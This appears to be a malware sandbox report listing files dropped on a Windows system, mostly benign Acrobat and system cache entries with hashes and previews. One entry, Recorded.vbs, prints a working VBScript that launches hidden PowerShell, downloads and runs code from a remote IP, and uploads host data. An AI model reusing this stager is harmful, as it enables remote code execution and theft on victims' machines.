                                                                      Entropy (8bit):0.8337918564339469
                                                                      Encrypted:false
                                                                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugZ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                                                                      MD5:0E63EA942E7D0C185B0774752F32E8FF
                                                                      SHA1:9D536989316B42E8B072E33E2361ACC59511ADA5
                                                                      SHA-256:35D1AA8B1B797192A6EFF54B0F239E3A3CCE3E70417A2F4F9753DCF0C0E3CD22
                                                                      SHA-512:D2CC868796E2FE10E643271EE5A151D26B122A90A0A40246B2580FE2E67F83A5F2EE92D3C5BF90D77C33E3F64C80DD731CDA50A8D662C5C5A74B8A5D357A2F91
                                                                      Malicious:false
                                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdfa5f68, page size 16384, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.6585211780652148
                                                                      Encrypted:false
                                                                      SSDEEP:1536:BSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Baza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                      MD5:1AB39FB2083EDDE9E8323012F6A85D4F
                                                                      SHA1:D91355EE21454F0C8E9FF7C75A378D34B052F3EF
                                                                      SHA-256:404F96845E9340733F063230084704E910F1D1B8AABC59E0A6C7B127E301BFAD
                                                                      SHA-512:BE73557E50D2E5DECF35E66D80A30573A11D8E60B3F8ACF6A983049BF36D5B5CE25A9593259DF667DF2A8D87942CCEDF7FDB89F82D30174835EB8A5A46825D3F
                                                                      Malicious:false
                                                                      Preview:.._h... ...............X\...;...{......................T.~......,...|...)...|..h.|......,...|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................D.9.,...|...................e&..,...|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.07950844231781955
                                                                      Encrypted:false
                                                                      SSDEEP:3:J3mltUetYeCV4e4Zllto1HJo71kYZlltKJ5Z4Zlltoll58Kgvvl/QoeP/ll:lmltNzFM1GRVOvGcz8KgR+t
                                                                      MD5:4A25EE32176C72B8A73A3586B49B4441
                                                                      SHA1:D93176CFC71F3AC8CC57C701AAE347DA1618373B
                                                                      SHA-256:0B30ECD0817DBACE604F38F5958461F3798B472D853783057F4E430B5EEB9895
                                                                      SHA-512:9D3D61D5DAB795BC2F514924A72672690F33199D1009C29EA4FA81F04A0D18FDC3F5D1DC784DC2AB8D74E24BB4F390F61E27DC6F59E017E84CFC34B824725F1F
                                                                      Malicious:false
                                                                      Preview:m.q......................................;...{...)...|5..,...|...........,...|...,...|...|...,...|...................e&..,...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\Public\Libraries\Recorded.vbs

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (708), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):780
                                                                      Entropy (8bit):5.47444462852123
                                                                      Encrypted:false
                                                                      SSDEEP:24:B5KXxuqHDoXs9u+oeoQVrL2/8xap7Uu73poXsgW0n:ohHkXshojQVeEUp7J7CXsw
                                                                      MD5:79C5A75750D2C901E3212EADD6A66BC0
                                                                      SHA1:DBA1B8554D40DA5C9A41CF9025BE70C6BE9EF0B1
                                                                      SHA-256:9284000139B2FA271F420224CBF794571F94CF0A1DD30A069FB26CC3CC68F3F8
                                                                      SHA-512:076AAD0A9ECBB4C00F24E8222B96B70B380443D0C6E133EC1C8E553F1AC598003DF5F994B1B8710603BC734C5B8D11CB706DC969B0A619F86EE003728618FF1D
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: C:\Users\Public\Libraries\Recorded.vbs, Author: Joe Security
                                                                      Preview:dim r, c..set r = createobject("WScript.Shell")..c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}"..r.Run c, 0, false....

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.2539116487069455
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuy9RJk9+q2P92nKuAl9OmbnIFUt82Iuy9RHUB9NJZmw+2Iuy9RHUB9N9VkwO9f:PcJk4v4HAahFUt82c0B9NJ/+2c0B9NDE
                                                                      MD5:C82E6457BC0DCE54C6670E733D5037A7
                                                                      SHA1:02664CB637AA4E81ED408D54E1FBEEDE52D767B6
                                                                      SHA-256:3B1EA92C98BB5712CE37F2CF6BD3495D84F1175AA045ABB89A438AA9E8A54977
                                                                      SHA-512:AC27E6179DBA8319275101F14779D3C8C370A4B44E8E3EBF491B1DCD64ED8FB6B481DBB19B5B6B26470C2BEA22DBDD4CC40187304D581641D93D2EB95EBFC7AB
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:15.866 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:41:15.868 1db8 Recovering log #3.2024/09/30-09:41:15.868 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.2539116487069455
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuy9RJk9+q2P92nKuAl9OmbnIFUt82Iuy9RHUB9NJZmw+2Iuy9RHUB9N9VkwO9f:PcJk4v4HAahFUt82c0B9NJ/+2c0B9NDE
                                                                      MD5:C82E6457BC0DCE54C6670E733D5037A7
                                                                      SHA1:02664CB637AA4E81ED408D54E1FBEEDE52D767B6
                                                                      SHA-256:3B1EA92C98BB5712CE37F2CF6BD3495D84F1175AA045ABB89A438AA9E8A54977
                                                                      SHA-512:AC27E6179DBA8319275101F14779D3C8C370A4B44E8E3EBF491B1DCD64ED8FB6B481DBB19B5B6B26470C2BEA22DBDD4CC40187304D581641D93D2EB95EBFC7AB
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:15.866 1db8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/30-09:41:15.868 1db8 Recovering log #3.2024/09/30-09:41:15.868 1db8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):338
                                                                      Entropy (8bit):5.171894523119665
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuy9dq2P92nKuAl9Ombzo2jMGIFUt82Iuy9mZZmw+2Iuy9nkwO92nKuAl9Ombzz:PAv4HAa8uFUt82f/+2M5LHAa8RJ
                                                                      MD5:80A9EB8B5721A37C7BF8A34FB0B10FD3
                                                                      SHA1:05CED9B9A513B779C54D3B72F78BAE18E4FE71AD
                                                                      SHA-256:0F2225D1D5216F54D6A8D626BB37D9276CA51E47EE9D030B5E3ED070714FB67C
                                                                      SHA-512:1485D6CA68BB197E1C35533C18BC109D65C5FC07B37083E3248E89F40B8733FD0CC240A77F0B5F7E26AFC245C377BA5FC2D1920517C17EF9834C83CE090DB828
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:15.896 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:41:15.898 1e20 Recovering log #3.2024/09/30-09:41:15.899 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):338
                                                                      Entropy (8bit):5.171894523119665
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuy9dq2P92nKuAl9Ombzo2jMGIFUt82Iuy9mZZmw+2Iuy9nkwO92nKuAl9Ombzz:PAv4HAa8uFUt82f/+2M5LHAa8RJ
                                                                      MD5:80A9EB8B5721A37C7BF8A34FB0B10FD3
                                                                      SHA1:05CED9B9A513B779C54D3B72F78BAE18E4FE71AD
                                                                      SHA-256:0F2225D1D5216F54D6A8D626BB37D9276CA51E47EE9D030B5E3ED070714FB67C
                                                                      SHA-512:1485D6CA68BB197E1C35533C18BC109D65C5FC07B37083E3248E89F40B8733FD0CC240A77F0B5F7E26AFC245C377BA5FC2D1920517C17EF9834C83CE090DB828
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:15.896 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/30-09:41:15.898 1e20 Recovering log #3.2024/09/30-09:41:15.899 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\55be8faf-6076-4f25-9e29-ee7ee9cdfb3a.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:modified
                                                                      Size (bytes):508
                                                                      Entropy (8bit):5.051360204753677
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqD1EsBdOg2HHAcaq3QYiubxnP7E4T3OF+:Y2sRdsg3dMHL3QYhbxP7nbI+
                                                                      MD5:3833200A0C82391B2C72987EB45FF9F0
                                                                      SHA1:499564DDA2022AEA9EC297D6FAE404AC9C38DA85
                                                                      SHA-256:2531DBD5197AF4B31C2EEAC48BC57F292D233DF5DE9308DEA2D6A9F14E21E1C8
                                                                      SHA-512:07F1C42843F76CBE07D7952288040D5448C05735CC4B5880327A4F0E6B885DFF2D6F5A2B0622DF7C8CF736BF1497F2743658ECAAA95329B17066002BE63A1995
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263685954699","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":129529},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):508
                                                                      Entropy (8bit):5.051360204753677
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqD1EsBdOg2HHAcaq3QYiubxnP7E4T3OF+:Y2sRdsg3dMHL3QYhbxP7nbI+
                                                                      MD5:3833200A0C82391B2C72987EB45FF9F0
                                                                      SHA1:499564DDA2022AEA9EC297D6FAE404AC9C38DA85
                                                                      SHA-256:2531DBD5197AF4B31C2EEAC48BC57F292D233DF5DE9308DEA2D6A9F14E21E1C8
                                                                      SHA-512:07F1C42843F76CBE07D7952288040D5448C05735CC4B5880327A4F0E6B885DFF2D6F5A2B0622DF7C8CF736BF1497F2743658ECAAA95329B17066002BE63A1995
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13372263685954699","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":129529},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4099
                                                                      Entropy (8bit):5.228732222138244
                                                                      Encrypted:false
                                                                      SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLU0qXi4Lx:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLm
                                                                      MD5:A9D415932ECEFE5AFAA54B948D69C030
                                                                      SHA1:911B639E44A1C103FAC1EBF0B16648C3609BFB58
                                                                      SHA-256:BC03BABEEF2591FC260C1BEE782559E7B256BE15B55718EDA965722FCD264250
                                                                      SHA-512:534C728220152635EA76169B811DED15D80C77C39581FC5A828F32D9713CB26E030C17152E89B342E5003C56C68B4E180E3D16DEB82E3816C2E016AD4E3EAA8D
                                                                      Malicious:false
                                                                      Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):326
                                                                      Entropy (8bit):5.161399960627827
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuyuXIq2P92nKuAl9OmbzNMxIFUt82Iuy3Zmw+2IuyoDkwO92nKuAl9OmbzNMFd:P/Iv4HAa8jFUt82k/+2JD5LHAa84J
                                                                      MD5:053FECF9EB9B9D8FB34B6193248FF6CB
                                                                      SHA1:3DB0E1704FCBD923C3F2B699DDEDB912D0DEDC74
                                                                      SHA-256:F1A02A54BAAD9993DF5B93BB7EE15998C0D10DA430D4BD6DF62EDE548C6C66B2
                                                                      SHA-512:522D643AE9B8F86BB24C36477A4FDFAECD74864D306888A9610841AC99343606972B1244BA507F8D8F3ADD15D65F4D26DA238B187EB902DC6C5A9DF0E324D49D
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:16.073 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:41:16.074 1e20 Recovering log #3.2024/09/30-09:41:16.075 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):326
                                                                      Entropy (8bit):5.161399960627827
                                                                      Encrypted:false
                                                                      SSDEEP:6:PIuyuXIq2P92nKuAl9OmbzNMxIFUt82Iuy3Zmw+2IuyoDkwO92nKuAl9OmbzNMFd:P/Iv4HAa8jFUt82k/+2JD5LHAa84J
                                                                      MD5:053FECF9EB9B9D8FB34B6193248FF6CB
                                                                      SHA1:3DB0E1704FCBD923C3F2B699DDEDB912D0DEDC74
                                                                      SHA-256:F1A02A54BAAD9993DF5B93BB7EE15998C0D10DA430D4BD6DF62EDE548C6C66B2
                                                                      SHA-512:522D643AE9B8F86BB24C36477A4FDFAECD74864D306888A9610841AC99343606972B1244BA507F8D8F3ADD15D65F4D26DA238B187EB902DC6C5A9DF0E324D49D
                                                                      Malicious:false
                                                                      Preview:2024/09/30-09:41:16.073 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/30-09:41:16.074 1e20 Recovering log #3.2024/09/30-09:41:16.075 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240930134117Z-159.bmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                      Category:dropped
                                                                      Size (bytes):65110
                                                                      Entropy (8bit):1.0025236639109925
                                                                      Encrypted:false
                                                                      SSDEEP:6:upCl/OuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuN:ptF
                                                                      MD5:913275AD9D8A17D6FE2695BB51BC7863
                                                                      SHA1:9C29246D92F80A7BDDEC1B53C8705EDBDC0A4759
                                                                      SHA-256:5E6EBDE5554818D0BD1203842D3FEE08CF894B3426C291244506CF749A3569CB
                                                                      SHA-512:48A23707771345E1F2F29A383D6EE1F6F3BF9E079603701ABA4B076724BFEDE2F79950B310F5597DA237451DA53D6877DA0EFF888DD84416DA09536037A8DDC6
                                                                      Malicious:false
                                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 3, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):57344
                                                                      Entropy (8bit):3.293550397139526
                                                                      Encrypted:false
                                                                      SSDEEP:192:/edRBFVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:/eDci5H5FY+EUUUTTcHqFzqFP
                                                                      MD5:E55F55F4B1B18FC52B77F52E998D909A
                                                                      SHA1:3E70FDC13A5EF4CC836901855EC7800D0981F69D
                                                                      SHA-256:8D39AD6168C2C9B57C8F9797EA8051A5B98B62FC9B805BAA077967826AAFB225
                                                                      SHA-512:A3A4D2ABC4864019E4BEE5E81266A734DC8FF03BD2F784BDF9D416321DE3C2AFEB4C0AB694F9BD00F859D187EA5B03AF592C2C0E10DE4A843CD54F856D4F4003
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):2.2040677335642003
                                                                      Encrypted:false
                                                                      SSDEEP:24:7+tJMEWewK3qLazkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9I:7MiU3qemFTIF3XmHjBoGGR+jMz+Lhm
                                                                      MD5:D9BD49178C6CADA353402D9D88C05DED
                                                                      SHA1:AB77FA5C0C17EDBEF07BBD8E44FED60A6CA3F5ED
                                                                      SHA-256:1F805A69E696FBD08EDDD9AEFF78DE7497479E324FCB2DA1ED949CDB2675CF89
                                                                      SHA-512:C52D527E5D57860F86F6FABEC465AEC57331BFBADBDD9B76EC368046205F73D6E98F9C47EE8888AE3EA3D5DF42982673ECA5DC0F6679F4320FBA049CDC4F0F72
                                                                      Malicious:false
                                                                      Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Certificate, Version=3
                                                                      Category:dropped
                                                                      Size (bytes):1391
                                                                      Entropy (8bit):7.705940075877404
                                                                      Encrypted:false
                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                      Malicious:false
                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):192
                                                                      Entropy (8bit):2.7282048283587708
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFklAW2hfllXlE/HT8kshttNNX8RolJuRdxLlGB9lQRYwpDdt:kKZWnT8rVNMa8RdWBwRd
                                                                      MD5:179C62DC8C48488C7543ACDB5690C564
                                                                      SHA1:CED9910F667AB80D460272BEDF55008ED86ABB45
                                                                      SHA-256:1C72A895C74852DD98AE1BF6766507C624273AD6112DE28860DE5483BDD1D8F3
                                                                      SHA-512:FB2DD62108EFF8527E2F6EE3037963595F12A96DC13F851C06091EAD6B5D3CDB8BDD32EEEEEFD80555441CD72F89D0EAB382FD1199BB05204DE39CD38068FFD1
                                                                      Malicious:false
                                                                      Preview:p...... ........33,r>...(....................................................... ..........W....yp..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
